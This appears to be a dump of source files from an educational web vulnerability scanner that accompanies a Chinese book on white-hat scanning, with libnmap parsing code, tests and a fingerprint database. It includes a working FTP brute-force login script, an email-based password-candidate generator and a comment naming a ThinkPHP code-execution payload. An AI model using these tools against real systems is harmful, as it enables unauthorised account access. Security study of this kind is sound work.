27 | if is_similar_url(item,a): 28 | flag = True 29 | if not flag: 30 | result.append(item) 31 | print "去似去含前的数据:" 32 | print url_list 33 | print "去似去含后的数据:" 34 | print result 35 | 36 | 37 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_new_parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | from libnmap.parser import NmapParser, NmapParserException 6 | 7 | baddatalist = ["aaa", None, '', 123, "ports/>>>", "", 8 | "", ""] 9 | 10 | 11 | class TestNmapParser(unittest.TestCase): 12 | def test_parse(self): 13 | for baddata in baddatalist: 14 | self.assertRaises(NmapParserException, NmapParser.parse, 15 | baddata, "zz") 16 | self.assertRaises(NmapParserException, NmapParser.parse, 17 | baddata, "XML") 18 | self.assertRaises(NmapParserException, NmapParser.parse, 19 | baddata, "YAML") 20 | 21 | if __name__ == '__main__': 22 | test_suite = ['test_parse'] 23 | 24 | suite = unittest.TestSuite(map(TestNmapParser, test_suite)) 25 | test_result = unittest.TextTestRunner(verbosity=2).run(suite) 26 | -------------------------------------------------------------------------------- /teye_web/wavsep/false_xss_url.txt: -------------------------------------------------------------------------------- 1 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case01-DoubleQuotesAndCrLfEncodingInProperty.jsp?userinput=abcd 2 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case02-SingleQuotesAndCrLfEncodingInProperty.jsp?userinput=abcd 3 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case03-DoubleQuotesEqualityAndBracketsEncodingInProperty.jsp?userinput=abcd 4 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case04-SingleQuotesEqualityAndBracketsEncodingInProperty.jsp?userinput=abcd 5 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case05-CrlfRemovalInHttpHeader.jsp?userinput=abcd 6 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case06-QuotesBracketsAndCrLfEncodingInTextProperty.jsp?userinput=abcd 7 | http://192.168.1.105:8080/wavsep/active/Reflected-XSS/RXSS-FalsePositives-GET/Case07-AngleBracketsEncodingInBody.jsp?userinput=abcd 8 | 9 | -------------------------------------------------------------------------------- /tests/test_smart_fill.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | smart_fill.py 4 | ''' 5 | form_name_kb = { 6 | "cannner":['username','user','userid','nickname','name'], 7 | "bc123456":['password','pass','pwd'], 8 | "est@watscan.com":['email','mail','usermail'], 9 | "13800000000":['mobile'], 10 | "his is just for a test":['content','text','query','search','data','comment'], 11 | "ww.test.com":['domain','website'], 12 | "ttp://www.test.com":['link','url'] 13 | } 14 | def smart_fill( variable_name ): 15 | ''' 16 | ''' 17 | variable_name = variable_name.lower() 18 | flag = False 19 | for filled_value, variable_name_list in form_name_kb.items(): 20 | for variable_name_db in variable_name_list: 21 | if variable_name_db == variable_name: 22 | flag = True 23 | return filled_value 24 | if not flag: 25 | msg = '[smart_fill] Failed to find a value for parameter with name "' 26 | msg += variable_name + '".' 27 | log.debug( msg ) 28 | return 'UNKNOWN' 29 | 30 | if __name__=="__main__": 31 | print smartfill("username") 32 | print smartfill("password") 33 | print smartfill("email") 34 | print smartfill("content") 35 | -------------------------------------------------------------------------------- /teye_port/ext/more_pass.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | more_pass.py 4 | ''' 5 | 6 | import sys 7 | 8 | pass_type_list=[ 9 | '123', 10 | 'abc', 11 | '_123', 12 | '!123', 13 | '@123', 14 | '#123', 15 | '123456', 16 | 'abc123', 17 | '123!@#', 18 | '!@#123', 19 | '123$%^', 20 | '!@#$%^', 21 | '', 22 | '123', 23 | '@123', 24 | '@abc', 25 | '123!@#', 26 | '!@#123', 27 | '123$%^', 28 | '!@#$%^', 29 | '@@123', 30 | '@@123' 31 | ] 32 | 33 | def get_pass_list(email): 34 | ''' 35 | >>>email="zhangsan@baidu.com" 36 | >>>ext_pass_list(email) 37 | >>>['zhangsan@123','zhangsan@baidu@123'...] 38 | ''' 39 | item = email.split("@") 40 | name = item[0] 41 | domain = item[1].split(".")[0] 42 | 43 | pass_list = [] 44 | 45 | for line in pass_type_list: 46 | pass_item = line.strip().replace("",name).replace("",domain) 47 | pass_list.append(pass_item) 48 | 49 | return pass_list 50 | 51 | if __name__=="__main__": 52 | result=get_pass_list("zhangsan@baidu.com") 53 | print result 54 | -------------------------------------------------------------------------------- /thirdparty/libnmap/reportjson.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import json 5 | from libnmap.objects import NmapHost, NmapService, NmapReport 6 | from libnmap.objects.os import NmapOSFingerprint, NmapOSMatch, NmapOSClass 7 | from libnmap.objects.os import CPE, OSFPPortUsed 8 | from libnmap.parser import NmapParser 9 | 10 | 11 | class ReportEncoder(json.JSONEncoder): 12 | def default(self, obj): 13 | otype = {'NmapHost': NmapHost, 14 | 'NmapOSFingerprint': NmapOSFingerprint, 15 | 'NmapOSMatch': NmapOSMatch, 16 | 'NmapOSClass': NmapOSClass, 17 | 'CPE': CPE, 18 | 'OSFPPortUsed': OSFPPortUsed, 19 | 'NmapService': NmapService, 20 | 'NmapReport': NmapReport} 21 | if isinstance(obj, tuple(otype.values())): 22 | key = ('__{0}__').format(obj.__class__.__name__) 23 | return {key: obj.__dict__} 24 | return json.JSONEncoder.default(self, obj) 25 | 26 | 27 | class ReportDecoder(json.JSONDecoder): 28 | def decode(self, json_str): 29 | r = NmapParser.parse_fromdict(json.loads(json_str)) 30 | return r 31 | -------------------------------------------------------------------------------- /teye_web/http/cookie.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | cookie.py 4 | ''' 5 | import re 6 | import teye_web.http.encode_decode as enc_dec 7 | from teye_web.http.data import data 8 | 9 | from encodings import DEFAULT_ENCODING 10 | 11 | class cookie(data): 12 | ''' 13 | This class represents a cookie. 14 | ''' 15 | def __init__(self, strValues='', encoding=DEFAULT_ENCODING): 16 | 17 | data.__init__(self, encoding=encoding) 18 | 19 | for k, v in re.findall('(.*?)=(.*?);', strValues + ';' ): 20 | k = k.strip() 21 | v = v.strip() 22 | 23 | self[k] = v 24 | 25 | def _sanitize( self, value ): 26 | value = value.replace('\n','%0a') 27 | value = value.replace('\r','%0d') 28 | return value 29 | 30 | def __str__( self ): 31 | ''' 32 | ''' 33 | res = '' 34 | for parameter_name in self: 35 | for element_index in xrange(len(self[parameter_name])): 36 | ks = self._sanitize( parameter_name ) 37 | vs = self._sanitize( self[parameter_name][element_index] ) 38 | res += ks + '=' + vs + '; ' 39 | return res[:-1] 40 | 41 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_nohostname.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendplugin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | class NmapBackendPlugin(object): 5 | """ 6 | Abstract class showing to the minimal implementation for a plugin 7 | All subclass MUST at least implement the following methods 8 | """ 9 | def __init__(self): 10 | self.dbname = 'nmapdb' 11 | self.store = 'reports' 12 | 13 | def insert(self, NmapReport): 14 | """ 15 | insert NmapReport in the backend 16 | :param NmapReport: 17 | :return: str the ident of the object in the backend for 18 | future usage 19 | or None 20 | """ 21 | raise NotImplementedError 22 | 23 | def delete(self, id): 24 | """ 25 | delete NmapReport if the backend 26 | :param id: str 27 | """ 28 | raise NotImplementedError 29 | 30 | def get(self, id): 31 | """ 32 | retreive a NmapReport from the backend 33 | :param id: str 34 | :return: NmapReport 35 | """ 36 | raise NotImplementedError 37 | 38 | def getall(self, filter): 39 | """ 40 | :return: collection of tuple (id,NmapReport) 41 | :param filter: Nice to have implement a filter capability 42 | """ 43 | raise NotImplementedError 44 | -------------------------------------------------------------------------------- /tests/test_class_HtmlParser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | 4 | import sys 5 | sys.path.append('/Users/imiyoo/workplace/tscanner') 6 | 7 | from wCurl import wcurl 8 | from teye_web.http.URL import URL 9 | from teye_web.parser.HtmlParser import HtmlParser 10 | 11 | 12 | def test_HtmlParser(): 13 | ''' 14 | ''' 15 | req_url="http://192.168.126.147" 16 | real_contain_urls=['http://www.w3.org/1999/xhtml', 17 | 'http://192.168.126.147/lnmp.gif', 18 | 'http://lnmp.org', 19 | 'http://192.168.126.147/p.php', 20 | 'http://192.168.126.147/phpinfo.php', 21 | 'http://192.168.126.147/phpmyadmin/', 22 | 'http://lnmp.org', 23 | 'http://bbs.vpser.net/forum-25-1.html', 24 | 'http://www.vpser.net/vps-howto/', 25 | 'http://www.vpser.net/usa-vps/', 26 | 'http://lnmp.org', 27 | 'http://blog.licess.com/', 28 | 'http://www.vpser.net'] 29 | r = wcurl.get(req_url) 30 | 31 | parser = HtmlParser(r) 32 | re_urls,tag_urls = parser.urls 33 | 34 | print "Regex URL:" 35 | for item in re_urls: 36 | print item 37 | 38 | print "Tag URL:" 39 | for item in tag_urls: 40 | print item 41 | 42 | page_urls = [] 43 | page_urls.extend(re_urls) 44 | page_urls.extend(tag_urls) 45 | 46 | true_num = 0 47 | for item in real_contain_urls: 48 | real_url = URL(item) 49 | if real_url in page_urls: 50 | true_num +=1 51 | else: 52 | print real_url 53 | 54 | assert len(real_contain_urls)==true_num 55 | -------------------------------------------------------------------------------- /teye_web/http/postdata.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | postdata.py 4 | ''' 5 | 6 | import encode_decode as enc_dec 7 | from data import data 8 | 9 | from encodings import DEFAULT_ENCODING 10 | 11 | class postdata(data): 12 | ''' 13 | ''' 14 | def __init__(self, init_val=(),encoding=DEFAULT_ENCODING): 15 | ''' 16 | ''' 17 | data.__init__(self, init_val, encoding) 18 | 19 | self._name = None 20 | self._method = None 21 | self._action = None 22 | self._files = None 23 | 24 | 25 | def get_action(self): 26 | ''' 27 | ''' 28 | return self._action 29 | 30 | def get_method(self): 31 | ''' 32 | ''' 33 | return self._method 34 | 35 | def set_method(self,method): 36 | ''' 37 | ''' 38 | self._method = method 39 | 40 | def set_name(self,name): 41 | ''' 42 | ''' 43 | self._name = name 44 | 45 | def set_action(self,action): 46 | ''' 47 | ''' 48 | self._action = action 49 | 50 | def set_file(self,files): 51 | ''' 52 | ''' 53 | self._files= files 54 | 55 | def set_data(self,key,value): 56 | ''' 57 | ''' 58 | self[key] = value 59 | 60 | def __str__(self): 61 | ''' 62 | return enc_dec.urlencode(self, encoding=self.encoding) 63 | ''' 64 | return enc_dec.urlencode(self, encoding=self.encoding) 65 | 66 | 67 | if __name__=="__main__": 68 | ''' 69 | ''' 70 | postdata = postdata([('id',1),('test',2)]) 71 | print postdata 72 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 《白帽子讲Web扫描》书籍参考代码说明 2 | 3 | ## 内容介绍 4 | > 由于本书并不是按照代码逻辑来进行编写的,所以建议读者先将项目代码运行起来后,然后再对照书籍来进行学习;代码已作处理,只保留完整的扫描器核心功能,主要以学习和研究为目的,相信认真读完本书后是有能力自己来实现完整云扫描功能;如果您在学习中有遇到问题或不清楚的地方,可以就具体问题进行留言交流和探讨。 5 | 6 | 7 | ## 购买链接:[京东](https://union-click.jd.com/jdc?e=&p=JF8BAOcJK1olXDYCV19VDUkQB19MRANLAjZbERscSkAJHTdNTwcKARlZAUEPVhcJRT9LT0VSBVJESw4PTRNJXGFOSxhBJVMOVF1cAE4VBGs4ciNJVQRbND0_Qxt1Rm0BWy9iKVRHElJROE4XAm4MEl0TXgUyV19eC00RAm4IH2slXQUyAjBdCUoWAm4NG14WbQQDVVtcDEkTBm04G1wXVAYKXVtdDUoQBl8PG1IlBVpaHAADC0oXAl84K1glbTYCZF1tSiVCUWlcElsUW1NRUwxYDxgfCzgLHltAXVNSAQtbWkpFUF8KGloRVDY) 8 | 9 | ## 部署安装 10 | 11 | > git clone https://github.com/imiyoo2010/teye_scanner_for_book.git 12 | 13 | > pip install -r requirements.txt 14 | 15 | > python teye.py 16 | 17 | 成功运行如下: 18 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/1.png) 19 | 20 | ## 使用演示 21 | 22 | 一、扫描具体目标 23 | > python teye.py -s "http://demo.testfire.net/" 24 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/2.png) 25 | 26 | 27 | 二、查看扫描报告 28 | 29 | > 扫描结束后,在teye_report中会自动生成简版的扫描报告供查看扫描结果,演示截图如下: 30 | 31 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/3.png) 32 | 33 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/master/4.png) 34 | 35 | ## 联系方式 36 | ![](https://github.com/imiyoo2010/teye_scanner_for_book/blob/047a9ee4bb6d81315fb7f4e11c84878639d4255b/qrcode_for_gh_d5852a962ba2_258.jpg) 37 | -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendpluginFactory.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import inspect 4 | 5 | 6 | class BackendPluginFactory(object): 7 | """ 8 | This is a backend plugin factory a backend instance MUST be 9 | created via the static method create() 10 | ie : mybackend = BackendPluginFactory.create() 11 | """ 12 | @classmethod 13 | def create(cls, plugin_name="mongodb", **kwargs): 14 | """Import the needed lib and return an object NmapBackendPlugin 15 | representing the backend of your desire. 16 | NmapBackendPlugin is an abstract class, to know what argument 17 | need to be given, review the code of the subclass you need 18 | :param plugin_name: str : name of the py file without .py 19 | :return: NmapBackend (abstract class on top of all plugin) 20 | """ 21 | backendplugin = None 22 | plugin_path = "libnmap.plugins.{0}".format(plugin_name) 23 | __import__(plugin_path) 24 | pluginobj = sys.modules[plugin_path] 25 | pluginclasses = inspect.getmembers(pluginobj, inspect.isclass) 26 | for classname, classobj in pluginclasses: 27 | if inspect.getmodule(classobj).__name__.find(plugin_path) == 0: 28 | try: 29 | backendplugin = classobj(**kwargs) 30 | except Exception as error: 31 | raise Exception("Cannot create Backend: {0}".format(error)) 32 | return backendplugin 33 | -------------------------------------------------------------------------------- /teye_poc/PocScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | PocScan.py 4 | ''' 5 | 6 | import sys 7 | from teye_web.http.URL import URL 8 | 9 | from teye_data.vuln import vuln 10 | from teye_data.vulnmanager import vm 11 | 12 | class PocScan: 13 | ''' 14 | 15 | ''' 16 | def __init__(self): 17 | ''' 18 | ''' 19 | self._poc_info ={ 20 | 21 | 'w_hat':{ 22 | 'author':None, 23 | 'blog':None, 24 | 'team':None, 25 | 'create_time':None 26 | }, 27 | 'w_vul':{ 28 | 'id':None, 29 | 'title':None, 30 | 'method':None, 31 | 'tag':None, 32 | 'rank':None, 33 | 'info':None, 34 | } 35 | } 36 | 37 | def check(self,target): 38 | ''' 39 | ''' 40 | pass 41 | 42 | def security_hole(self,url): 43 | ''' 44 | ''' 45 | if isinstance(url,URL): 46 | url = url.url_string 47 | else: 48 | url = url 49 | 50 | name = self._poc_info['w_vul']['title'] 51 | method = self._poc_info['w_vul']['method'] 52 | link_info = self._poc_info['w_vul']['info'] 53 | rank = self._poc_info['w_vul']['rank'] 54 | 55 | v = vuln() 56 | v.set_url(url) 57 | v.set_name(name) 58 | v.set_rank(rank) 59 | v.set_method(method) 60 | v.set_link_info(link_info) 61 | 62 | site = URL(v.get_url()).get_host() 63 | 64 | vm.append(self,site,v.get_name(),v) 65 | 66 | def get_title(self): 67 | return self._poc_info['w_vul']['title'] 68 | 69 | def get_name(self): 70 | ''' 71 | ''' 72 | return "teye_poc_plugin" 73 | 74 | 75 | if __name__=="__main__": 76 | ps = PocScan() 77 | ps.security_hole("http://wwww.baidu.com") 78 | print vm.get_all_vuln() 79 | -------------------------------------------------------------------------------- /env_config.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | env_config.py 4 | 配置扫描所需要的环境 5 | ''' 6 | import os 7 | import platform 8 | import teye_config as Settings 9 | 10 | os_info = platform.platform() # 获取操作系统名称及版本号,'Windows-7-6.1.7601-SP1' 11 | sys_info = platform.system() # Linux or windows or darwin 12 | ''' 13 | def nmap_search_path(): 14 | pass 15 | 16 | syslist = { 17 | "win": ["windows"], 18 | "linux": ['ubuntu', 'centos', 'debian'], 19 | "mac": ["darwin"] 20 | } 21 | 22 | if os_info.lower() in syslist.get("mac"): # Mac 23 | # Install brew 24 | cmd = 'ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2 > /dev/null' 25 | os.system(cmd) 26 | # Install Nmap 27 | cmd = "brew install nmap" 28 | os.system(cmd) 29 | # Install python-nmap 30 | cmd = "pip install python-nmap" 31 | os.system(cmd) 32 | 33 | if os_info.lower() in syslist.get("linux"): # Linux 34 | # python-dev,python-pip 35 | os.system("apt-get -y install python-dev") 36 | os.system("apt-get install python-pip") 37 | # lxml 38 | os.system("apt-get -y install libxml2 libxml2-dev") 39 | os.system("apt-get -y install python-libxml2") 40 | os.system("apt-get -y install python-lxml") 41 | 42 | # nmap 43 | os.system("apt-get -y install nmap") 44 | 45 | # python-paramiko 46 | os.system("apt-get -y install python-paramiko") 47 | 48 | if os_info.lower() in syslist.get("win"): # windows 49 | pass 50 | ''' 51 | # pip install -r requirements.txt 52 | piprequire = Settings.ROOT_PATH + "/requirements.txt" 53 | os.system("pip install -r " + piprequire) 54 | -------------------------------------------------------------------------------- /teye_data/vuln.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | vuln.py 4 | ''' 5 | 6 | import uuid 7 | import json 8 | 9 | class vuln(dict): 10 | ''' 11 | ''' 12 | def __init__( self ): 13 | #设置默认值 14 | self["url"] = None 15 | self["method"] = None 16 | self["param"] = None 17 | self["name"] = None 18 | self["title"] = None 19 | self["rank"] = None 20 | self["desc"] = None 21 | self["link_info"] = None 22 | 23 | 24 | def set_url(self,url): 25 | ''' 26 | ''' 27 | self["url"] = url 28 | 29 | def set_method(self,method): 30 | ''' 31 | ''' 32 | self["method"] = method 33 | 34 | def set_param(self,param): 35 | ''' 36 | ''' 37 | self["param"] = param 38 | 39 | def set_name(self,name): 40 | ''' 41 | ''' 42 | self["name"] = name 43 | 44 | def set_rank(self,rank): 45 | ''' 46 | ''' 47 | self["rank"] = rank 48 | 49 | def set_link_info(self,link_info): 50 | ''' 51 | ''' 52 | self["link_info"] = link_info 53 | 54 | def get_url(self): 55 | ''' 56 | ''' 57 | return self["url"] 58 | 59 | def get_name(self): 60 | ''' 61 | ''' 62 | return self["name"] 63 | 64 | def get_rank(self): 65 | ''' 66 | ''' 67 | return self["rank"] 68 | 69 | def get_method(self): 70 | ''' 71 | ''' 72 | return self["method"] 73 | 74 | def get_param(self): 75 | ''' 76 | ''' 77 | return self["param"] 78 | 79 | def __str__(self): 80 | ''' 81 | ''' 82 | return json.dumps(self) 83 | 84 | def __repr__(self): 85 | ''' 86 | ''' 87 | if isinstance(self["name"],unicode): 88 | name = self["name"].encode("utf-8") 89 | elif isinstance(self["name"],basestring): 90 | name = self["name"] 91 | 92 | return '' 93 | -------------------------------------------------------------------------------- /teye_web/util/smart_fill.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | smart_fill.py 4 | ''' 5 | import sys 6 | sys.path.append("/Users/imiyoo/workplace/tscanner/") 7 | 8 | from LogManager import log 9 | 10 | parameter_name_knowledge = { 11 | 'tscanner': ['username','user','uname','userid','nickname', 'logname','name','lastname','firstname'], 12 | 13 | 'abc123456': ['pass','word','pswd','pwd','auth','password'], 14 | 15 | 'test@watscan.com':['mail','email','e-mail'], 16 | 17 | 'www.test.com':['domain'], 18 | 19 | 'http://www.test.com/':['link','target', 'url', 'website', 'website'], 20 | 21 | 'Just For A Test!':['content','text', 'words', 'query', 'search', 'keyword', 'title', 'desc', 'data', 22 | 'payload', 'answer', 'description', 'descripcion', 23 | 'message', 'excerpt', 'comment'], 24 | 25 | 'www.watscan.com':['domain'] 26 | 27 | } 28 | 29 | def smart_fill( variable_name ): 30 | ''' 31 | ''' 32 | variable_name = variable_name.lower() 33 | 34 | flag = False 35 | 36 | for filled_value, variable_name_list in parameter_name_knowledge.items(): 37 | 38 | for variable_name_db in variable_name_list: 39 | 40 | if variable_name_db == variable_name: 41 | 42 | flag = True 43 | 44 | return filled_value 45 | 46 | if not flag: 47 | 48 | msg = '[smart_fill] Failed to find a value for parameter with name "' + variable_name + '".' 49 | log.debug( msg ) 50 | 51 | return 'UNKNOWN' 52 | 53 | if __name__=="__main__": 54 | print "usrname=%s" % smart_fill("username") 55 | print "password=%s" % smart_fill("password") 56 | print "domain=%s" % smart_fill("domain") 57 | print "email=%s" % smart_fill("email") 58 | print "content=%s" % smart_fill("content") 59 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/proc_nmap_like.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from libnmap.process import NmapProcess 3 | from libnmap.parser import NmapParser, NmapParserException 4 | 5 | 6 | # start a new nmap scan on localhost with some specific options 7 | def do_scan(targets, options): 8 | nm = NmapProcess(targets, options) 9 | rc = nm.run() 10 | if rc != 0: 11 | print("nmap scan failed: {0}".format(nm.stderr)) 12 | 13 | try: 14 | parsed = NmapParser.parse(nm.stdout) 15 | except NmapParserException as e: 16 | print("Exception raised while parsing scan: {0}".format(e.msg)) 17 | 18 | return parsed 19 | 20 | 21 | # print scan results from a nmap report 22 | def print_scan(nmap_report): 23 | print("Starting Nmap {0} ( http://nmap.org ) at {1}".format( 24 | nmap_report._nmaprun['version'], 25 | nmap_report._nmaprun['startstr'])) 26 | 27 | for host in nmap_report.hosts: 28 | if len(host.hostnames): 29 | tmp_host = host.hostnames.pop() 30 | else: 31 | tmp_host = host.address 32 | 33 | print("Nmap scan report for {0} ({1})".format( 34 | tmp_host, 35 | host.address)) 36 | print("Host is {0}.".format(host.status)) 37 | print(" PORT STATE SERVICE") 38 | 39 | for serv in host.services: 40 | pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format( 41 | str(serv.port), 42 | serv.protocol, 43 | serv.state, 44 | serv.service) 45 | if len(serv.banner): 46 | pserv += " ({0})".format(serv.banner) 47 | print(pserv) 48 | print(nmap_report.summary) 49 | 50 | 51 | if __name__ == "__main__": 52 | report = do_scan("127.0.0.1", "-sV") 53 | print_scan(report) 54 | -------------------------------------------------------------------------------- /teye_port/brute_ftp.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import sys 3 | import ftplib 4 | 5 | BRUTE_BREAK = True 6 | 7 | def Login(ServerIP, username, password): 8 | ''' 9 | ''' 10 | f = ftplib.FTP() 11 | f.connect(ServerIP, 21, timeout=10) 12 | print "Login FTP..." 13 | try: 14 | f.login(username, password) 15 | except ftplib.all_errors: 16 | print "Error:Server %s Cannot Login by the Account(%s,%s)" % (ServerIP, username, password) 17 | f.quit() 18 | return False 19 | 20 | return True 21 | 22 | 23 | def Brute(ServerIP, userlist, passlist, Port=21): 24 | ''' 25 | ''' 26 | user_handler = open(userlist) 27 | pass_handler = open(passlist) 28 | try: 29 | user_line = user_handler.readlines() 30 | pass_line = pass_handler.readlines() 31 | finally: 32 | user_handler.close() 33 | pass_handler.close() 34 | 35 | for user in user_line: 36 | ftpuser = user.strip() 37 | for pwd in pass_line: 38 | ftppass = pwd.strip() 39 | print "testing account:(%s,%s)" % (ftpuser, ftppass) 40 | success = False 41 | try: 42 | success = Login(ServerIP, ftpuser, ftppass) 43 | except: 44 | continue 45 | if success: 46 | print "%s:%d-->(%s,%s) Success" % (ServerIP, Port, ftpuser, ftppass) 47 | if BRUTE_BREAK: 48 | sys.exit(-1) 49 | 50 | print "---------------Brute End-----------------" 51 | # print user_line 52 | # print pass_line 53 | 54 | 55 | if __name__ == "__main__": 56 | # sucess=LoginFtp('x.x.x.x','admin','admin') 57 | 58 | # if sucess: 59 | # print "Login Success!" 60 | # else: 61 | # print "Login Failed!" 62 | Brute("192.168.126.145", "username.lst", "password.lst") 63 | -------------------------------------------------------------------------------- /teye_file/finger/app.db: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #teye_finger 3 | #json 4 | #应用指纹库 5 | #特殊符号:",\,需要进行转义处理 6 | #\\用来表示\ 7 | #网络组件,服务组件,主机组件,建站组件,其它组件,按分层思想来划分 8 | {"nginx":{"url":"/","headers":["server","nginx"]}} 9 | {"lnmp":{"id":1,"url":"/p.php","body":"PHP探针\\s*for\\s*LNMP一键安装包","type":"other"}} 10 | {"jboss":{"url":"/","headers":["X-Powered-By","JBoss"]}} 11 | {"360wzb":{"url":"/","headers":["X-Powered-By-360WZB","360"]}} 12 | {"yunjiasu":{"url":"/","headers":["server","yunjiasu-nginx"]}} 13 | {"anquanbao":{"url":"/","headers":["server","aserver"]}} 14 | {"struts":{"url":"/struts/webconsole.html","body":"Welcome\\s*to\\s*the\\s*OGNL\\s*console\\!"}} 15 | {"dedecms5.6":{"url":"/templets/default/style/dedecms.css","body":"dedecms\\s*v5\\.6\\s*style"}} 16 | {"wordpress":{"url":"/wp-admin","body":"name=\"wp-submit\""}} 17 | {"discuz":{"url":"/","body":"content=\\\"Discuz"}} 18 | {"discuz7.2":{"url":"/forumdata/cache/common.js","body":"var\\sdiscuz_uid"}} 19 | {"anquangou":{"url":"/","headers":["X-Powered-By","WAF/2\\.0"]}} 20 | {"phpwind":{"url":"/res/css/admin_layout.css","body":"phpwind\\.com"}} 21 | {"Joomla":{"url":"/administrator/components/com_login/login.xml","body":"Joomla\\!"}} 22 | {"phpcmsv9":{"url":"/phpcms/templates/default/special/index.html","body":"\\{pc:special\\s*action="}} 23 | {"cmseasy":{"url":"/celive/js/system.js","body":"www\\.cmseasy\\.cn"}} 24 | {"live800":{"url":"/live800/chatClient/sendFile.htm","body":"UploadFile"}} 25 | #代码执行漏洞module/aciton/param1/$%7B@phpinfo()%7D 26 | {"thinkphp":{"url":"/?c=4e5e5d7364f443e28fbf0d3ae744a59a","headers":["Content-Type","image/png"]}} 27 | #phpmyadmin 28 | {"phpmyadmin":{"url":"/phpmyadmin","body":"phpMyAdmin\\s*"}} 29 | {"Spring MVC":{"url":"/spring_security_login","body":"j_spring_security_check"}} 30 | {"贷齐乐金融系统":{"url":"/themes/default/images/bg.png","md5":"241a8a919e8dbd0017148eee96ecd5cf"}} 31 | -------------------------------------------------------------------------------- /taskSchedule.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | nohup python taskSchedule.py & 4 | ''' 5 | import os 6 | import sys 7 | import time 8 | import json 9 | import datetime 10 | import teye_config as Settings 11 | 12 | from LogManager import log 13 | from Queue import Queue 14 | from teye_worker.RDB import RDB 15 | from teye_worker.scan import DoScanTask 16 | 17 | WAT_MSG_INFO={"taskid":"","website":"","profile":"","message":""} 18 | 19 | if __name__=='__main__': 20 | ''' 21 | ''' 22 | q = Queue(Settings.MAX_DISPATCH_TASK) 23 | while True: 24 | while True: 25 | count = 0 26 | try: 27 | rdb = RDB() 28 | rdb.connect() 29 | tasks =rdb.getNewtasks(Settings.MAX_DISPATCH_TASK) 30 | for task in tasks: 31 | msg= task.get("msg") 32 | taskid=task.get("taskid") 33 | taskstarttime = datetime.datetime.now() 34 | rdb.updateFlag(taskid) 35 | rdb.updateStart(taskid,taskstarttime) 36 | q.put(msg) 37 | rdb.close() 38 | break 39 | except Exception,e: 40 | print str(e) 41 | count +=1 42 | if count > Settings.MAX_RETRY_COUNT: 43 | sys.exit(-1) 44 | time.sleep(Settings.RETRY_INTERVAL) 45 | 46 | worker_count = q.qsize() 47 | wait_circle = worker_count/Settings.MAX_CONCURRENT_NUM 48 | 49 | while True: 50 | if q.empty()==True: 51 | break 52 | 53 | msg_list = [] 54 | for i in xrange(Settings.MAX_CONCURRENT_NUM): 55 | if not q.empty(): 56 | msg = q.get() 57 | msg_list.append(msg) 58 | 59 | for item in msg_list: 60 | try: 61 | DoScanTask.delay(item) 62 | except: 63 | pass 64 | 65 | time.sleep(wait_circle*Settings.SCAN_TASK_INTERVAL) 66 | time.sleep(Settings.DISPATCH_TASK_INTERVAL) 67 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_banner_ports_xmas.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
